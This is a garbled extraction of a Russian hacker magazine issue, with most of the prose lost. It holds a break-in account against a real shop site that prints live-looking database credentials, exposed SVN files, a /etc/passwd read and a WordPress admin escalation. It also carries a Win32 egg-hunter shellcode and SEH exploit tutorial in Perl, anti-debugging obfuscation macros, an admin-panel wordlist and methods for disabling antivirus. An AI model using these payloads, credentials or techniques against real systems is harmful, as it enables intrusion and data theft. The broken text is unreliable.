variant = rndnum mod 2
if variant = 0
randomize
value = rndnum mod IMAGE_BASE

060

68001127b6
812c249b10e7b5
ff2424
31c0
83c404
31c0

|
|
|
|
|
|

push dword 0xb6271100


sub dword [esp], 0xb5e7109b
jmp dword near [esp]
xor eax, eax
add esp, 0x4
xor eax, eax

, , ,
. \ ,
Esp , .
, (
). ,
. :
macro facke_code_ref data_addr,jmp_addr {
xor eax,eax
inc eax
jnz jmp_addr
call data_addr
;trash
}

data_addr .

0XA55 \

FASM,
, load store.
. , xor:
macro xor_data start,length,key {
repeat length
load x from start+%-1
x = x xor key
store x at start+%-1
end repeat
}

, . :
randomize
XOR_KEY = rndnum mod 0xFF
xor_data strings, strings_size, XOR_KEY
strings:
X 08 /139/ 10


radare
any_string db 'Mate.Feed.Kill.Repeat'
strings_size = $ - strings

0XABA51A,

,
, .
int3,
. , crc32 :
CRC32_SUM = 0
macro calc_crc32 start, size {
local b,c
c = 0xffffffff
repeat size
load b byte from start+%-1
c = c xor b
repeat 8
c = (c shr 1) xor (0xedb88320 * (c and 1))
end repeat
CRC32_SUM = c xor 0xffffffff
}


;mov eax,[fs:0x30],
test eax,eax
js @f+1
call .end.sign
pop eax
add eax,7
db 0xC6
nop
ret
@@:
db 0xE9,0x00,0x00,0x00,0x00
.end.sign:
else if variant = 1
;CD-Cops II -> Link Data Security
push ebx
pushad
mov ebp,0x90909090
lea eax,[ebp-0x70]
lea ebx,[ebp-0x70]
call $+5
lea eax,[ecx]
db 0xE9,0x00,0x00,0x00,0x00
...
else if variant = N
...

, if(original_hash != current_
hash) Error() ! , . :
mov eax,address + original_hash
sub eax,current_hash
call eax

. : , , ,
- , .

0XACCEDE,

PEiD , ,
\. ,
, , Entry
Point . ,

, , . , , , .
macro facke_sign {
randomize
variant = rndnum mod N
if vatiant = 0
;PE Protect 0.9 -> Christoph Gabler
push edx
push ecx
push ebp
push edi
db 0x64, 0x67, 0xA1, 0x30, 0x00
;FASM
X 08 /139/ 10

0XAD105.


. : ,
, . ,
, ,
.
:
FASM, trial- ;
,
. (,
crack' ..)
. , , ,
, . , ,
, . , open your
eyes, open your mind! z

061


icq 884888, http://snipper.ru

!
-

! .
growshop azarius.net
.
About Azarius, ,
-
( 1999 ) .
,
:).

, , , ,
, mod_
rewrite, http://azarius.net/smartshop/
psychedelics/. ,
, WordPress (http://azarius.net/
blog/), phpBB 2.0.22 (http://azarius.net/forum/
docs/CHANGELOG.html) - Piwik 0.5.5
(http://piwik.azarius.net).
Piwik
XSS ( advisory ). XSS , ,

.

.
,
, .svn-
. .
-, SVN ,

.

062

-, SVN
, .svn.
entries
, , .svn.
, , ,
.
, :
SVN, ,
site.com/.svn/entries,
.
azarius.net/.svn/entries,

2008-11-18T10:25:57.000000Z
c581920ba2dad34f3e6841ac061d958c
2007-11-16T11:06:53.860515Z
935
alex
category.php
file
2008-11-18T10:25:57.000000Z
7ce2e23ac9bc560edc2e79073fb630db
X 08 /139/ 10

HTTP://WWW

links

2007-01-04T16:03:07.477725Z
138
alex
find.php
file
2009-05-01T12:58:14.000000Z
beea2f728667240c14795d3c508a5144
2009-05-01T09:08:40.782967Z
1307
alex
recent.php
file

, PHP-
.svn/text-base/, .
,
azarius.net
,
, - .
- ,
, .
,
:).

phpBB azarius.net/forum/.svn/
text-base/common.php.svn-base:
<?php
$dbms = 'mysql4';
$dbhost =
$dbname =
$dbuser =
$dbpasswd

'database.azarius.net';
'azaforum';
'web_azarius';
= 'azariuskaki734';

$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>

, -
database.azarius.net
.
80 HTTP- :
[an error occurred while processing this
directive]
You don't have permission to access the
requested directory.
X 08 /139/ 10

There is either no index document or the


directory is read-protected.
[an error occurred while processing this
directive]

Phpmyadmin' , 3306
.

( :) MySQL RST/
GHC Manager,
phpBB.
, ( ,
-
!).
, .
, :
information_schema, Affiliate, aff, azabase
azaforum, cms_system, cmsbase, enquete,
payments, syslog, syslogaza, test, wordpress

payments log,
,
azabase.
: 239545 , 291187 .
:
UserID, UserStatusID, FirstName,
LastName, Email, EmailVerified, Company,
CompanyDescription, KVKNumber,
BTWNumber, InvoiceAllowed, Remark,
Password, ForumID, ForumAdmin,
LastLogin, LangID, CurrencyID,
_Buyer_Address, _Buyer_Host, _Buyer_Agent,
_Klantcode, _Tussenvoegsel, _Korting,
_PasswordNew, _EmailSend, _session_id,
_Website, modified, Newsletter, Nickname


, ,
-
:).

piwik.org/
blog/2010/04/piwik-06-security-advisory/
Piwik <= 0.5.5
Login Form XSS
habrahabr.ru/blogs/
infosecurity/70330/
.svn
https://forum.
antichat.ru/threadnav51383-1-10.html
MySQL RST/GHC
Manager 2.3
snipper.ru/view/5/
magic-include-shell/
Magic Include Shell
3.3.3

INFO

info


MySQL
.

mysql.user,


Host (

%,
localhost).

WARNING
info



.


.
,



,

.

063

azarius.net
cat ./*|grep
ServerName:

SELECT load_file('/etc/passwd')

, SVN
.
, , , ,
,
WordPress :).
, http://www.azarius.net/blog/wp-login.
php?action=register , wordpress.
,
wp_usermeta wp_capabilities.
, , , :
a:1:{s:10:"subscriber";b:1;}

, ,
:
a:1:{s:13:"administrator";b:1;}

, http://azarius.net/
blog/wp-admin .
,
Hello dolly .
http://azarius.net/
blog/?azarius :).

:
1. ;
2. ;
3. -.
, PHP-
/var/www/html/azarius/public/, , ,
.
, ,
.
locate httpd.conf /
etc/apache2/sharedconfig/sites-enabled/,
.

064

affiliate.herbaldistribution.com
blog.azarius.net
conscious.nl
consciousdreams.nl
database.azarius.net
dropshipping.consciouswholesale.com
middleware.entheogenics.com
pimpyourbicycle.com
piwik.azarius.net
redir.vaposhop.com
secure.azarius.net
stats.azarius.net
webman.azarius.net
webman.vaposhop.com
www.azarius.at
www.azarius.be
www.azarius.es
www.azarius.fr
www.azarius.net
www.azarius.nl
redir.azarius.nl
www.azarius.pt
consciouswholesale.com
www.crazy-t-shirts.com
www.cultofarcha.com
www.entheogenics.com
greenlabelseeds.com
www.mushxl.nl
www.shavita.net
www.shroomshaker.net
smartshop.nl
www.travellersgarden.com
vaposhop.com
www.xtenzion.nl

, azarius.net ,
:). , ,
.
,
,
, , (,
, :).

-
,
.

, , , . , , ! z
X 08 /139/ 10

egg hunt

][

Windows.
, - .
: /.
Egg Hunting.
EGG HUNTING?


, . , .
, Egg Hunting ,
/. .

skape 2003 (hick.org/code/skape/papers/egghuntshellcode.pdf).

, ,
/ ,
. , .
, ...
, ,
PoC-.
, , TCP-.
,
, -

066

, , .
, , ,
, ,
,
, , , .
, staged-,
, . - ,
staged-. ,
200 (
27 :)), 341 .
\x00\xff, ,
227 368 .
, -: 534, 816.
, .
c . ,
DNS, Easy Hack,
1000 , .
?
? -. .

, ,
EIP. , MSF X 08 /139/ 10


SEH

Payload information. , ms08_067_netapi 400 ,
trendmicro_serverprotect 800 , ActiveX , . ,
, . ?
, .
- . ?
. , IE 6/7, -,
, imap- Mercur
Messaging imap-.

, ... ,
Windows ASLR, SafeSEH,
DEP, GS .. ? ,
, , . , , . ,
:).
jit-spay IE8, FF3.6 DEP, ASLR
(exploit-db.com/exploits/13649/), .
jit-
, .
- .

- ?
-, - ,
.
,
. tag egg, egg hunting.
,
. , ,
. ,
, , :).
,
().
,
access violation, .
-, ,
. ( )
Windows. :
, ,
.
.
X 08 /139/ 10

NTDISPLAYSTRING / NTACCESSCHECKANDAUDITALARM

( :)) . (system call) NtDisplayString


. :
NTSYSAPI NTSTATUS NTAPI NtDisplayString(
IN PUNICODE_STRING String
);

, : EAX ,
, .
, , EDX. EAX
0xc0000005, Access Violation. scads,
(egg) EAX EDI.
:
00000000
00000005
00000006
00000007
00000009
0000000A
0000000C
0000000E
0000000F
00000011
00000016
00000018
00000019
0000001B
0000001C
0000001E

6681CAFF0F
42
52
6A43
58
CD2E
3C05
5A
74EF
B890509050
8BFA
AF
75EA
AF
75E7
FFE7

or dx,0xfff
inc edx
push edx
push byte +0x43
pop eax
int 0x2e
cmp al,0x5
pop edx
jz 0x0
mov eax,0x77303074
mov edi,edx
scasd
jnz 0x5
scasd
jnz 0x5
jmp edi

, EDX
. 1000h x86,
, , , .
, EBX FFF,
, 1000h.
, , EDX 1h(.
00000019, 0000001C), ,
1000h (. 0000000F).
EDX , , .
EAX 0x43h. , NtDisplayString. int 2e
. , ,
EAX. 0x5

067


( , access violation)
. , ,
EDX .
. 0x77303074 (
, w00t), . EAX, EDI
EDX. SCASD EAX c ,
EDI.
, EDX ,
.
SCASD ,
. SCASD
EDI , , jmp edi.
-
? , skape
NtDisplayString
NtAccessCheckAndAuditAlarm.
.
NtDisplayString:
00000007 6A43

push byte +0x43

NtAccessCheckAndAuditAlarm:
00000007 6A02

push byte +0x2

NtAccessCheckAndAuditAlarm . (0x43h),
NtDisplayString
.

ISBADREADPTR

API- .
:
BOOL IsBadReadPtr(
const VOID* lp,
UINT_PTR ucb
);

,
.
,
.

068

Egghunter

00000000
00000002
00000007
00000008
0000000A
0000000B
00000010
00000012
00000014
00000016
0000001B
0000001D
0000001E
00000020
00000021
00000023

33DB
6681CBFF0F
43
6A08
53
B80D5BE777
FFD0
85C0
75EC
B890509050
8BFB
AF
75E7
AF
75E4
FFE7

xor ebx,ebx
or bx,0xfff
inc ebx
push byte +0x8
push ebx
mov eax,0x77e75b0d
call eax
test eax,eax
jnz 0x2
mov eax, 0x77303074
mov edi,ebx
scasd
jnz 0x7
scasd
jnz 0x7
jmp edi

EBX
. , 0x8h ucb-, EBX
. EAX IsBadReadPtr . ,
, -, ,
. EAX ,
. .
SEH,
,
(60 ), , , XP SP2 SEH',
.

() ,
( )
, , , .
SCASD, ,
(D) , ,
.
CDL.
X 08 /139/ 10

:
access violation 41414141.
: EIP , . ESI, ECX.
(. ). SEH (View - SEH
chain).
, . . , ,
pvefindaddr.
:
!pvefindaddr pattern_create 2000


,
. ,
,
, 100%
.
, Linux- ,
Windows, , , .
skape.

. .

,
.
, , , .
Audacity.
1.2.6. offensive-security.com/
archive/audacity-win-1.2.6.exe, .
, ,
.
Immunity
Debugger c pvefindaddr corelanc0d3r' (
). immunityinc.com/productsimmdbg.shtml, corelan.be:8800/index.php/security/
pvefindaddr-py-immunity-debugger-pycommand/ .
, pvefindaddr , .
PyCommands.
Perl, Win
ActivePerl activestate.com/activeperl.
, . MIDI- . AAAAA
2000 .
#!/usr/bin/perl
$junk = "\x41" x 2000 ;
# 2
$sploit = $junk;
#
open(FILE, ">test.gro") or die "Cannot open file: $!";
#
print FILE $sploit;
#
close(FILE); #
print "test.gro has been created \n";

Audacity (F9).
(- MIDI).
X 08 /139/ 10

, (l)
mspattern.txt Immunity Debugger,
$junk. test.gro
(ctrl+F2).
, suggest,
8 , ,
(, SEH ..),
.
!pvefindaddr suggest

.
, SEH
67413966, :
!pvefindaddr pattern_offset 67413966

SEH, . SEH-
4- .
(nextSEH),
, ,
. . , , -
pop, pop, ret,
, ,
. nextSEH
, , , \xeb\x06\x90\
x90. 6 (2 \x90
(NOP) 4 SEH), ,
.
, ,
:).
, SEH 178 , next SEH 174. .
, pop pop
ret, .
. . p safeSEH, p1
safeSEH ASLR, 2 . .
!pvefindaddr p

, , ,
, . -.

069

pvefindaddr

$junk = "\x41"x174; #
$jumpNextSEH = "\xeb\x06\x90\x90"; # 6

$SEH = pack ("V",0x013e5423); # pop


pop ret
$shell = "\x42"x200"; # ,
B 200
$sploit = $junk.$jumpNextSEH.$SEH.$shell;

, . SEH-:
1. View SEH chain;
2. Follow hadler.

pop, pop, ret. , pop'


F2 ( SEH chain). Shift+F9, .
pop. (F7) ret NextSEH, 6 .
B.
, ,
200 . 72 . .
, . , ,
... .
-
.
,
:
#!/usr/bin/perl
$shell="\xeb\x03..\x5a"; # -
open(FILE, ">shell") or die "Cannot open file: $!";
print FILE $shell;
close(FILE);
!pvefindaddr compare c:\egg\shell

, , -.
, .
.
, 73 , .
,
, - . - 72 ,
, . :

070

, SEH-

#
$tag="\x77\x30\x30\x74";
# NtAccessCheck
$egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\
x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" . $tag . "\x8B\
xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
#
$junk2="\x90"x50;
#
$sploit = $junk.$jumpNextSEH.$SEH.$egghunter.$junk2.
$tag.$tag.$shell;

$junk2 , 73
, ,
() , . -, .
SEH, .
,
,
. , EDX(\x33\xD2)
. ,
.
. :
corelanc0d3r': corelan.be:8800/index.php/2010/01/09/exploitwriting-tutorial-part-8-win32-egg-hunting/.
MSF: offensive-security.com/metasploitunleashed/ - : r00tin.
blogspot.com/2009/03/heap-only-egg-hunter.html

. . , .
, , ,
. , , ,
,
. , Mercur Messaging 2005 IMAP-.

SUBSCRIBE(CVE-ID: 2007-1579). 224 payload. ,
LIST , 2 . McAfee
ePolicy Orchestrator 3.5.0. 140 , .
- , , .
:). z
X 08 /139/ 10

!

1.

8.5

DVD

!
3 !
? ?
.
.
( )




.

540 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)2003-999 ( ,
, ).
,
info@glc.ru

, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,

:
2200 . 12 , 1260 . 6

. ,

, R-kiosk
. .27-31:
540.00 . 6 !

, , , .


icq 884888

X-TOOLS

: ATC File Wiper
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: AlexTheC0d3r

E:\ATCfilewiper.exe "e:\downloads\
papka_dlya_ydaleniya"

(
);

;


.
extraClean:
D:\vasya\*.exe
C:\documents and settings\Admin\My
Documents\*.*
C:\MyProgs\*.pas
C:\nokia\jimm.*

,
- .
,
.

, .

.
, ATC File Wiper
AlexTheC0d3r'
: GUI .
:
(
);
,
, <;
(
);
Windows;
GUI
:
e:\Program Files\ATC\wipergui.exe
"D:\papka_dlya_ydaleniya" 15);

072


, .
,
, (
).
, ,

https://forum.antichat.ru/
showpost.php?p=1898379.

: WebDirScanner
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0x00

;

-;

oks.txt log.txt (^ ": ");

;
.Net Framework 2.0 .

,
:
dmin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php


webxakep.net/
forum/showthread.php?t=5201.

- .
WebDirScanner
webxakep.net, 0x00.
,

.
:

dir.txt;

: ArxGrabberSite
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: ArxWolf

,


ArxGrabberSite.
,
.
X 08 /139/ 10




,
, PHP:
Email: [_a-zA-Z\d\-\.]+@[_a-zAZ\d\-]+(\.[_a-zA-Z\d\-]+)+
URL: (?i)href=("|#39|)(http://|h
ttps://|ftp://|www.|UPD://)([_az\d\-]+(\.[_a-z\d\-]+)+)((/[ _az\d\-\\\.?=&%://]+)+)*
JS: <script([^>]*?)>(.*?)</script>

:
email-;
;
JavaScript;
;
;
;
.

ArxWolf' webxakep.net/forum/
showthread.php?t=4850.

: SGalaxy v 0.7
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: RINGER




(javagala.ru).

:
;
;
;
;
;
;
;
email.

,

.

:
0
;
1-5
1-5 ;
X 08 /139/ 10

911 ;
922 ;
999 ;
933 ;
111 ;
1000 ;
222 email;
40
;
50 .

, :)

: VK VoTeR
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: mailbrush


VK VoTeR

mailbrush.
,
,

.
.
:
1. ;
2. ;
3.
(, :)

":"

.

, ,
.
.
:
;
[OPTION]
;
, .
, #8 ,
,

:

[OPTION] the best!|


[OPTION]|[OPTION] !

,
"|",
:
the best!

!

, . ,
https://forum.antichat.
ru/thread194387.html.

: slil.ru File Uploader


:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: slesh


,
slil.ru.
:
1. ;
2. :
2000, XP, 2003 C:\Documents and
Settings\< >\SendTo\
Vista, 7 C:\Users\< >\AppData\Roaming\Microsoft\
Windows\SendTo\

,
.
slil.ru.
:
;
;
;
(WinAPI + WinSock);
7680 .

. z

073

MALWARE
RankoR ax-soft.ru

l
a
t
o
T
s
iru
V



, VirusTotal',
.
? ,
,
.

, ? .
. VDS,
Dedicated. Core
Duo, 2 RAM (10
/) $100 .
:).

074

Linux
,
( )
.
Ubuntu Server 10.04.
C++/Qt.
,

, Qt ,
.
PHP + AJAX. ?
/, ,
.
.
X 08 /139/ 10

PHP-

const QString &av,


QString &output,
const int exitCode);
private slots:
void onFinished(int exitCode,
QProcess::ExitStatus exitStatus);
void onReadyRead();


.
? ,
stdout.
, --help, , (, )
.
?
(
][ ), Qt QProcess,
.
, . , . ?

. :
class QAvProcess : public QProcess {
void inline startProcess(
const QString &name,
const QStringList &params);
......
signals:
void onAvFinished(QAvProcess *sender,

};

, QProcess.
:
void QAvProcess::startProcess(
const QString &name,
const QStringList &params)
{
QFileInfo info(name);
avName = info.fileName();
start(name, params);
}

, . ,
onReadyRead, , onFinished()
emit onAvFinished(this, avName,
avBuffer, exitCode). , , :

WARNING
warning

INFO

info
RESPECT
-3-1
(
)
.
DieHard, YaesU, metal
Asechka.Ru community

class QAv : public QObject{


void startCheck(const QString &fName);
private:
QMap<QString, QString > avs;
QList<QResultPair > results;
QString fileName;
inline QAvProcess* createProcess();
QVirInfo inline parseOutput(
const QString &avName,
const QString &output);
signals:
void onAVDone(const QString avName,
const QString avResult);
private slots:
void onAvFinished(QAvProcess *sender,
const QString &av,
const QString &output,
const int exitCode);
};

. X 08 /139/ 10

075

MALWARE

onAvFinished()
QString avName = avs.find(av).value();
if ( avName.isEmpty() ){
qDebug() << "[-] Unknown process finished";
return;
}
avsRemains--;
QVirInfo info = parseOutput(av, output);
if ( ! info.isInfo ) {
writeResult(avName, "ERROR");
return;
}
if ( ! info.isInfected )
writeResult(avName, "OK");
else {
writeResult(avName, info.description);
avsFound++;
}
delete sender;
if ( ! avsRemains ) {
qDebug() << endl << endl << "Done,"
<< avsFound << "/" << totalAVs << "found!";
qDebug() << endl << "RankoR, Ax-Soft.Ru,
Russia, 2010";
writeFooter();
QCoreApplication::exit();
}

startCheck():
void QAv::startCheck(const QString &fName)
{
qDebug() << "[*] Scanning file";
fileName = fName;
QStringList params;
QAvProcess *process;
// BitDefender
process = createProcess();
params << "--action=ignore"
<< fileName;
process->startProcess("bdscan",
params);
params.clear();
}

fName, , , .

.
, , (const QString &fName)? ,
( , , QString fName)
, ,
(QString fName) . , .
const QString &fName
. (
sizeof(void*)), , .
, ,
. ? ,
,
. , . ,

076

,
( ).
, , .
, qDebug(). ?
Qt ( ,
).

createProcess(). :
QAvProcess *process = new QAvProcess;
connect(process, SIGNAL(onAvFinished
(QAvProcess*,QString, QString,int)),
this, SLOT(onAvFinished(QAvProcess*,
QString,QString,int)));
return process;

,
onAvFinished() (. )
: avs QMap
typedef QPair<QString, QString > QResultPair;
;
.
parseOutput().
,
. :
QVirInfo info;
info.isInfo = info.isInfected = false;
if ( avName == "bdscan" ) { // BitDefender
if ( output.indexOf("ok") > 0 ) {
info.isInfo = true;
return info;
}
int index = output.indexOf("infected:");
if ( index == -1 )
return info;
info.description = output.mid (index + 9,
output.indexOf("\n", index) index - 9).trimmed();
info.isInfo = info.isInfected = true;
}

.
- , . , ( , )
. .
onAvFinished().
HTML- .
! . : ? , :
1. .
. 1 1 . ?
Iptables !
2.. /
/ .
3. .

, . PHP! C++ PHP + Ajax ,


Ajax- Sajax, SQL- SQLite .

. . , :)..z
X 08 /139/ 10

MALWARE
deeonis deeonis@gmail.com

INSIDE

AV-:
!

?
, ,
... ,
. -.
,
.
. Kaspersky CRYSTAL.
. ,

,
, ,
,

078

. Dr.Web Security
Space Pro. .
, .

-
.
,

Kaspersky

.



. ,

X 08 /139/ 10

. !

. , .

- .
. ,
API-.
,
, ,
. , ,
,
, API-
.
,
Windows
. ,
. ,

, .
, ,
, -.

Windows. , Windows XP Professional SP3.



.
, , ,

. ,
.
.
, -,
.

.

,
.
, .
- . ,

. ,
. MoveFileEx,
.
, , ,
. ,
NULL
,
MOVEFILE_DELAY_UNTIL_REBOOT,
.
. , .
. ,
. Kaspersky
CRYSTAL. ,
, avp.exe.
,

X 08 /139/ 10

WARNING
warning

INFO

info
RESPECT
-3-1
(
)
.
DieHard, YaesU, metal
Asechka.Ru community

079

MALWARE



MOVEFILE_DELAY_UNTIL_REBOOT MoveFileEx
,
.
(
),
.
: . ,
. .
,
. ,
, :
DWORD pseudoRandomDigit(const DWORD digit)
{
fopen("dsjklfjsdlk", "r");
DWORD err = ::GetLastError();
return digit + err;
}

pseudoRandomDigit .
,
.
,
, - . , , ,
- .

. ,
%programfiles%\Kaspersky Lab\Kaspersky CRYSTAL\.
,
,
.
, ,
. -
, .
.
avp.exe -
.
, Kaspersky CRYSTAL , , , .
, .
Dr.Web Security Space Pro.
CRYSTAL, exe-, .
, , , dwengine.exe.
, . , .
! ,
- , ,
.

,
. , .
:).

080

2
- , . .
,
. .
,
.
Kaspersky CRYSTAL. avp.exe, .
. ,
. , ,
Kaspersky . :
.
Dr.Web .
- , ,
. license.txt! .

3

, . , , , MoveFileEx
MOVEFILE_DELAY_UNTIL_REBOOT.
,
(. ).
Kaspersky CRYSTAL
. , , . ,
? , ... .
. , avp.exe . .
CRYSTAL
. : , . Dr.Web?
, , ? , .
, .
. - ,

.
. ,
. .

4

Windows XP Professional.
... : gpedit.
msc. .
User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
.
avp.exe.
Windows,
. Kaspersky CRYSTAL
, .
, . , . !
Dr.Web . dwengine.
exe ,
, .
SpIDer Guard.
- .
, .
X 08 /139/ 10


.
:)
,
, , , , ,
. .

5
. ,
.
,
.
.
Kaspersky CRYSTAL
: msiexec /quiet /
uninstall {1A59064A-12A9-469F-99F6-04BF118DBCFF}.
/quiet ,
, . .
,
, .

.
.
Dr.Web , , .
msiexec

.

1
2
3
4
5

X 08 /139/ 10

. .
. ,
, ,
,
. ,
, . Dr.Web
, .

. .
, . Kaspersky
CRYSTAL, Dr.Web Security Space Pro
.
,
.z

KASPERSKY CRYSTAL VS DR.WEB


SECURITY SPACE PRO
:
. Windows.
.
. MoveFileEx MOVEFILE_DELAY_UNTIL_REBOOT.
-: Kaspersky CRYSTAL 3.6 , Dr.Web Security
Space Pro 4.4 .

KASPERSKY CRYSTAL
3
3
2
5
5
3.6

DR.WEB SECURITY SPACE PRO


5
5
5
4
3
4.4
081


Mifrill mifrill@real.xakep.ru

IT-

,
. ,
,

.
, ,
,
,
- , , ,
, , .
,
? ? .
,
,
,
IT-,

. ,
, , ,
. , ,
,
.
, ,
how to, ,
.
,
,
,
IT- . ,
,

082
074


Discovery :).

,
:
? , ,
, ,
, . ,
,
, ,
. , ,
, .
, , , ,
( hh.ru

).
,
, ,
, .
:
, ; ,

.

, ,
,
, .
, , ,
.
, , ,


, (http://forum.awd.
ru/),
.
, ,
, ,
, . ? . ,
:

. , ,
, .
, ,

. , :).
.
, , .
,
, ,

.
: , ,

IT-.
, ,
, ,
. ,

. , ,
,
X 08 /139/ 10

?
, :
?. :
, .
IT-.

, , . , , .
.
/.
IT-.
, , . , -
, - ,
, (
, ).

:
?!.

, , , IT-
.
X 08 /139/ 10

; ,

,
, , ,
. ,
, -

, .
,
,
,
,
.

.
,
. ,
HardnSoft ,
,
:


( , ,
). ,
, -.


HardnSoft.
,
.

:).
, 28 2009
( ) .
. 40

083

,
.
: , , , ,
. , (
).
20
, $185,
.
$300$500, ,
. $30
.
. $200
, .
,
.

, , ,
.
,
$350.
. ,
.
,
, -
:).
, ,
.
.
, , .
-

084

$70-$100 .
.
, .
.
, ,
$500-$700 .
,
, .
, , 53 ,
. ,

.
IT- ,

( ,
).
-
(
), -,
, ;
60% .

, , , -, , ,
. ,

,
, - , ,
, - IT,
.
,
,
, ,
,
,
. , ,
, ,
- SEO-
:).

,
,
, ,
, .
IT-
, ,
,
,
, .

, ,
45 ,
.
, , , ,


( ).
IT- ,
, .
, IT-, ,
, .
, ,

,

, , ,
.
45
X 08 /139/ 10

, , ,
.

.
, 3-5
IT-,
- . ,
, ,
, . ,
,
( ), ,
.
, ,
,
, ,
.
,
Tier 1,

),

.
, .
-
. , -
800-1000 ,
500 .

.
,
,
- .
, ,
,
(
). ,

.
,

,
, ,
,

. , Tier
1
IELTS
, (Masters
Degree),
.
UK
90 . ,
( NARIC ),
90 , ,
,
.
(
,
500-700 (24-33 . ) ,
100
), , ,
.

, (
,
).

20%,
,
IT, , - .
,
, (
,
X 08 /139/ 10


, , , EU.
, , ,

. .


,
.
,
. ,
, , :
800-1000 ;

300 . ,
.

,

, .
,
,
:

, - .

IT-, ,
.

,

.
(
), ,
.
, , , , ,
IT-
- :).

- 5000 .


, , , ,
.
, , : ,
,

- .
McAfee
senior reverse engineer.
, ,
.
Mifrill (M): ? , ?
(..): .
,
,
- - .
, ,
.
,
,
.
.: , ,
, ,
. ?
..:
,
. , sensepost.com. ,
, ,
. .
.: , ?
,
,
,
?
..: , , ,
, . ,
, , .

085

, ,

(, , , ).
- ,
,
,
. , -
. ,
.

,
$800
. Endeavor Security.
, ,
?
, ,
, .
. - ,
, 2008 .

, ,
, McAfee
. 2009 ,
.

.:
.
, , , ?

.: , ,
, ,
, , ?

..: , ,
, ,
.
. ,
,
.
, ,

, . , ,
6 -

..:
,
.
12 , 4,
.
, , ,
. ,

, ,
. ,

..:
( -
) . ,
, ,
, ,
.
,
. ,
Apple, .
, -. , ,

, McAfee,
, iDefence.
,
, .

.: , .
( ,
)?

,
, ,
.
Macrovision,
: , ,
.
, .
: :).

,
, ?
..: ,
. ?
? , ,
. ,
-,
.
, ...
, .
,
$5 ,
. -

086


- ,
- .
, ,
,
. , .
, .
,
. ,

.
.: , McAfee.
, ?
..: 2009 Endeavor Security, , McAfee,
,
. ,
,

... , -
, ,
- ( 10 . 5 , ),
.
, ,
.
, ,
, ,
, .
,
.
. , 10 000
. , [censored].
.: -
?
X 08 /139/ 10


.
, ,

.
, .

.: , ,
. , , , , ,
, ? ,
.


..: , . ,
Google Aurora.
. ,
, , -,
. , ,
... ,
, .
.
.: ?
..: ,
. ,
. ,

, , , ...
,
, , . (Asus eee, , )

:).
.: ,
,
?
..: , , McAfee
. , .
.: , ?..


.
,

:). , .

,
.
.: , ,
, ,
.
?
..: , ,
, :).
5-
, , 1/4
. .
X 08 /139/ 10

..: , .
( ),
, , , , .
, , ,

i94, ,

. ,
,
. , , ,
.
, i94 .
6 ,
, .

..: ?
, ,
(
!). $2000
,
,
.
, , .
, .
, ID,
.
.
... -,
,
$500
, $10 000
. , . , ,
:)

: 100
,
, , , . ... , ,
256 $20 ,
.
,
- ,
.
15 ,
.
: ,
, .
- , .
.
,
, .
. ?
,
, .
P.S.
O-1A,
,
! z

087

UNIXOID
bober zloy.bobr@gmail.com


Linux
Unix, ,
(ugo),
.
, , -
,
. - .

,
- .

088

, ,
, .
Unix , -
.

(Discretionary Access Control DAC),


.
,

, .
DAC
X 08 /139/ 10

SELinux
, , , ,

.
.
, DAC :
;
. Linux
,
MAC (Mandatory Access Control, ).
,
,
. MAC , DAC, Unix, ,
,
.
, Unix
. ,
.
:

. ,
, -
,
. ,
, .
,

. Linux :
SELinux RedHat , AppArmor Ubuntu.
2.6.30
TOMOYO Linux (tomoyo.sf.jp),
, .
, .

SELINUX
SELinux (Security Enhanced Linux, selinuxproject.
org) U.S. NSA (National Security Agency),

Linux ,
-, . 2000 ,
: -
, ?
X 08 /139/ 10

SELinux Administration
GNU
GPL 2.6., FreeBSD OpenSolaris.
MAC ,
.
SELinux - Role-Based Access Control (RBAC),
. SELinux Type Enforcement
(TE) ,
, .
, , , ,
, , ,
(
). SELinux (MLS, Multi-Level Security model),
, ,
,
.
, SELinux
,
. ,
. (, , , .)
, .
, SELinux ,
.
,
- .
,
Extended attributes
.
.
, .
, .
SELinux ( semanage),
UID Linux
(uid), .
SELinux ,
Linux
SELinux.

HTTP://WWW
links
SELinux selinuxproject.
org

TOMOYO Linux
tomoyo.sf.jp

INFO

info



,


.
.

DVD

dvd



089

UNIXOID

LIDS, GRSecurity RSBAC


, , , Linux-
LIDS (Linux Intrusion Detection System, lids.org), GRSecurity
(grsecurity.org) RSBAC (Rule Set Based Access Control, www.rsbac.
org). .
LIDS MAC, . TPE (Trusted
Path Execution) TDE (Trusted Domain Enforcement)
, , .
, .
- .
# lidsconf -A -o /sbin -j READONLY

GRSecurity , MAC/ACL, chroot,


TCP ISN PID,
RBAC, ,
PaX ( ).
, gradm ACL.
RSBAC,
, 2000 . , ,
.
(GFAC,
Generalized Framework for Access Control). root ,
.
: Linux
DAC, , JAIL, PaX,
Dazuko, Linux .
, .

AppArmor
# ps aux | grep syslogd
root 2729 0.0 0.0 5908 624 ? Ss 07:30 0:00 syslogd -m 0
# cat /proc/2729/attr/current
system_u:system_r:syslogd_t:s0

SELinux disable (),


enforcing ( , , ), permissive ( ,
avc: denied, ).
, , , ,
/selinux:
$ cat /selinux/enforce

1, , SELinux .
, 0 1:
# echo 0 > /selinux/enforce

su SELinux. root .
:
$ id Z
user_u:user_t:unconfined_t

:
$ su
# id Z
user_u:user_t:unconfined_t

, :
# id -Z
root:system_r:unconfined_t:SystemLow-SystemHigh

setenforce [ Enforcing |
Permissive | 1 | 0 ].
, /etc. , RedHat,
SELinux Administration Tool (system-configselinux, policycoreutils-gui). ,
/etc/sysconfig/selinux ( /etc/selinux/
config). , SELINUX:
